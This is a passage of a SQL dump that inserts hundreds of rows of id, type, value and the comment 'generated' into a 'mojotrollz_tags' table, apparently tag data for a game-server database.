INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21327, 2, 1, 48, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21327, 2, 2, 719, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21459, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21509, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21530, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21581, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21582, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21583, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21678, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21679, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21701, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22205, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22207, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22208, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22216, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22217, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22218, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22219, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22220, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22221, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22222, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22223, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22229, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22230, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22231, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22234, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22245, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22246, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22248, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22250, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22251, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22253, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22254, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22255, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22257, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22258, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22259, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22260, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22261, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22262, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22530, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22531, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22533, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22534, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22535, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22536, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22537, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22538, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22540, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22541, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22543, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22544, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22545, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22546, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22547, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22549, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22550, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22563, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22564, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22565, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22566, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22567, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22569, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22576, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22577, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22578, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22579, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22580, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22581, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22582, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22587, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22588, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22589, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22590, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22591, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22592, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22593, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22594, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22595, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22598, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22599, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22600, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22602, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22603, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22604, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22605, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22606, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22622, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22623, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22638, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22639, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22647, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22648, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22649, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22650, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22651, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22652, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22654, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22658, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22659, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22660, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22661, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22662, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22664, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22665, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22666, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22667, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22668, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22670, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22671, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22672, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22673, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22674, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22684, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22685, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22706, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22707, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22708, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22709, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22710, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22711, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22712, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22719, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22727, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22732, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22733, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22734, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22735, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22736, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22737, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22738, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22739, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22740, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22741, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22742, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22743, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22744, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22745, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22746, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22747, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22748, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22749, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22750, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22751, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22752, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22753, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22754, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22755, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22772, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22773, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22774, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22775, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22776, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22777, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22783, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22803, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22804, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22806, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22811, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22812, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22813, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22831, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22832, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22833, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22834, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22835, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22836, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22854, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22855, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22856, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22858, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22860, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22864, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22865, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22879, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22880, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22882, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22883, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22884, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22885, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22886, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22887, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22904, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22908, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22909, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22910, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22915, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22916, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22917, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22918, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22919, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22920, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22921, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22922, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22923, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22924, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22925, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22926, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22927, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23013, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23014, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23015, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23016, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23017, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23018, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23295, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23296, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23299, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23301, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23302, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23303, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23304, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23305, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23570, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23571, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23572, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23573, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23574, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23575, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23577, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23879, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23880, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23881, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24388, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24389, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24390, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24392, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24393, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24395, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24396, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24398, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24399, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24401, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24469, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24470, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24479, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24480, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (24486, 2, 1, 0, 'generated'); INSERT INTO 